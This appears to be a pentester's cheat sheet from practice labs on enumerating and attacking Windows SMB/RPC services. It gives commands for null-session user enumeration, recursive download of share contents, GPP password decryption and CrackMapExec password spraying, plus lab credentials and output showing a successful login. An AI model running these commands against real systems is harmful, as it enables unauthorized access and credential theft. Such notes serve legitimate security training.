enum4linux
rpcclient
rpcclient -U '' 10.129.229.11
rpcclient> enumdomusers
hit tab twice
rpcclient> querydispinfo
smbclient
Null session
smbclient //10.129.230.0/support-tools -N
smbclient -L //IP -U '' -P ''
Connect to a share
Connect and download recursively all resources
smbclient //IP/IPC$
smbclient //10.129.229.121/Replication
smb: \> recurse on
smb: \> prompt off
smb: \> mget *
SMB Null session
smbclient -L //IP -U '' -P ''
smbmap
smbmap -d active.htb -u SVC_TGS -p GPPstillStandingStrong2k18 -H 10.129.229.121
Group Polict Preferences (GPP)
gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
CrackMapExec smb
Determine Password Policy
crackmapexec smb 10.129.228.111 --pass-pol
└─# crackmapexec smb 10.129.96.157 -u ./users.txt -p ./passwords.txt
SMB 10.129.96.157 445 SUPPORTDESK [*] Windows 10.0 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\admin:stealth1agent STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [+] SupportDesk\Hazard:stealth1agent
SID bruteforcing
crackmapexec smb 10.129.96.157 -u hazard -p stealth1agent --rid-brute
Password bruteforce
Users / Users
Try out first username combinations as a password
crackmapexec smb 10.129.228.111 -u ./users.txt -p ./users.txt --continue-on-success
Users / Username (1)
try username as the password (only one attempt per user)
crackmapexec smb 10.10.85.7 -u ./users.uniq -p ./users.uniq --continue-on-success --no-bruteforce
Users with empty password
try users with empty passwords
└─# crackmapexec smb 10.10.85.7 -u ./users.uniq -p '' --continue-on-success --no-bruteforce
